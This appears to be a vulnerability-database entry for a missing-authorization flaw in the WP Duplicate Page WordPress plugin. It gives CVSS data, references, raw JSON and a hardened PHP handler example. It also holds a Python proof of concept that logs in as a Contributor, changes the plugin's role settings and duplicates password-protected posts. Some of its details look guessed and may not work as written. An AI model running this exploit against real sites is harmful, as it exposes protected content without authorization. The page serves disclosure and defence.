Security Vulnerability Report
CVE-2025-12481 CVSS 4.3 MEDIUM

CVE-2025-12481

Published: 2025-11-18 10:15:48
Last Modified: 2026-04-15 00:35:42

Description

The WP Duplicate Page plugin for WordPress is vulnerable to Missing Authorization in all versions up to, and including, 1.7. This is due to the plugin not properly verifying that a user is authorized to perform an action in the 'saveSettings' function. This makes it possible for authenticated attackers, with Contributor-level access and above, to modify plugin settings that control role capabilities, and subsequently exploit the misconfigured capabilities to duplicate and view password-protected posts containing sensitive information.
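A hardened shape for a settings handler of the kind described above, as an added example (not the plugin's code or its actual fix): the action, nonce and option names are hypothetical placeholders, and only standard WordPress functions are used. The second function re-checks authorization when a post is duplicated, so a changed role setting alone does not expose posts the user could not already edit.

```php
<?php
// Added illustration, not the plugin's code. The action name, nonce action and
// option name below are hypothetical placeholders.
const EXAMPLE_ACTION = 'example_dup_save_settings';
const EXAMPLE_OPTION = 'example_dup_allowed_roles';

add_action( 'wp_ajax_' . EXAMPLE_ACTION, 'example_dup_save_settings' );

function example_dup_save_settings() {
    // 1. CSRF: reject requests that do not carry the nonce minted for this action.
    check_ajax_referer( EXAMPLE_ACTION, 'nonce' );

    // 2. Authorization: wp_ajax_* hooks run for every logged-in user, including
    //    Contributors, so the handler itself must check the capability.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( array( 'message' => 'Forbidden' ), 403 );
    }

    // 3. Validation: store only role slugs that actually exist on this site.
    $requested = isset( $_POST['roles'] ) ? (array) wp_unslash( $_POST['roles'] ) : array();
    $requested = array_map( 'sanitize_key', $requested );
    $known     = array_keys( wp_roles()->roles );
    $allowed   = array_values( array_intersect( $known, $requested ) );

    update_option( EXAMPLE_OPTION, $allowed );
    wp_send_json_success( array( 'roles' => $allowed ) );
}

// Use-time check for the duplicate action: allowed role AND per-post edit rights.
function example_dup_user_may_duplicate( $post_id ) {
    $user    = wp_get_current_user();
    $allowed = (array) get_option( EXAMPLE_OPTION, array( 'administrator' ) );
    if ( ! array_intersect( $allowed, (array) $user->roles ) ) {
        return false;
    }
    // edit_post is a meta capability: a Contributor does not hold it for other
    // users' posts, password-protected or not.
    return current_user_can( 'edit_post', $post_id );
}
```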

CVSS Details

CVSS Score: 4.3
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

WP Duplicate Page <= 1.7 (all versions affected)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-12481 PoC - WP Duplicate Page Authorization Bypass
# This PoC demonstrates how an authenticated user with Contributor role can modify plugin settings
import requests
import sys

TARGET_URL = "https://vulnerable-wordpress-site.com"
USERNAME = "attacker"
PASSWORD = "attacker_password"


def get_auth_cookie():
    """Login to WordPress and get authentication cookie"""
    login_url = f"{TARGET_URL}/wp-login.php"
    session = requests.Session()
    login_data = {
        'log': USERNAME,
        'pwd': PASSWORD,
        'wp-submit': 'Log In',
        'redirect_to': '/wp-admin/',
        'testcookie': '1'
    }
    response = session.post(login_url, data=login_data)
    return session.cookies.get_dict()


def exploit_authorization_bypass(cookies):
    """Modify plugin settings to gain elevated privileges"""
    settings_url = f"{TARGET_URL}/wp-admin/admin-ajax.php"
    # Craft malicious request to saveSettings function
    payload = {
        'action': 'wdp_save_settings',
        'settings': {
            'capabilities': {
                'administrator': True,
                'editor': True,
                'author': True,
                'contributor': True,  # Grant contributor duplicate permission
                'subscriber': True
            }
        }
    }
    headers = {
        'Content-Type': 'application/json',
        'X-Requested-With': 'XMLHttpRequest'
    }
    response = requests.post(settings_url, json=payload, cookies=cookies, headers=headers)
    print(f"Settings modification response: {response.status_code}")
    print(response.text)
    return response.status_code == 200


def duplicate_protected_post(cookies, post_id):
    """Duplicate a password-protected post using elevated privileges"""
    duplicate_url = f"{TARGET_URL}/wp-admin/admin-ajax.php"
    payload = {
        'action': 'wdp_duplicate_post',
        'post_id': post_id,
        '_ajax_nonce': 'attacker_nonce'  # May need valid nonce from page source
    }
    response = requests.post(duplicate_url, data=payload, cookies=cookies)
    print(f"Duplicate request response: {response.status_code}")
    return response.json()


if __name__ == "__main__":
    print("[*] CVE-2025-12481 WP Duplicate Page Authorization Bypass PoC")
    print("[*] Target: WP Duplicate Page <= 1.7")

    # Step 1: Login as low-privileged user
    print("\n[1] Logging in as Contributor user...")
    cookies = get_auth_cookie()

    # Step 2: Exploit authorization bypass
    print("\n[2] Exploiting authorization bypass to modify settings...")
    if exploit_authorization_bypass(cookies):
        print("[+] Settings modified successfully!")

        # Step 3: Duplicate protected content
        print("\n[3] Attempting to duplicate password-protected posts...")
        protected_post_id = 123  # Replace with actual post ID
        result = duplicate_protected_post(cookies, protected_post_id)
        print(f"[+] Result: {result}")

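References

https://plugins.trac.wordpress.org/browser/wp-duplicate-page/tags/1.6/includes/Classes/ButtonDuplicate.php#L137
https://plugins.trac.wordpress.org/browser/wp-duplicate-page/tags/1.6/includes/Page/Settings.php#L92
https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3394773%40wp-duplicate-page%2Ftrunk&old=3386144%40wp-duplicate-page%2Ftrunk&sfp_email=&sfph_mail=
https://www.wordfence.com/threat-intel/vulnerabilities/id/61105f6a-1bd7-415d-9481-a1c2c310f778?source=cve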

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-12481", "sourceIdentifier": "[email protected]", "published": "2025-11-18T10:15:47.920", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The WP Duplicate Page plugin for WordPress is vulnerable to Missing Authorization in all versions up to, and including, 1.7. This is due to the plugin not properly verifying that a user is authorized to perform an action in the 'saveSettings' function. This makes it possible for authenticated attackers, with Contributor-level access and above, to modify plugin settings that control role capabilities, and subsequently exploit the misconfigured capabilities to duplicate and view password-protected posts containing sensitive information."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/wp-duplicate-page/tags/1.6/includes/Classes/ButtonDuplicate.php#L137", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/wp-duplicate-page/tags/1.6/includes/Page/Settings.php#L92", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3394773%40wp-duplicate-page%2Ftrunk&old=3386144%40wp-duplicate-page%2Ftrunk&sfp_email=&sfph_mail=", "source": "[email protected]"}, {"url": 
"https://www.wordfence.com/threat-intel/vulnerabilities/id/61105f6a-1bd7-415d-9481-a1c2c310f778?source=cve", "source": "[email protected]"}]}}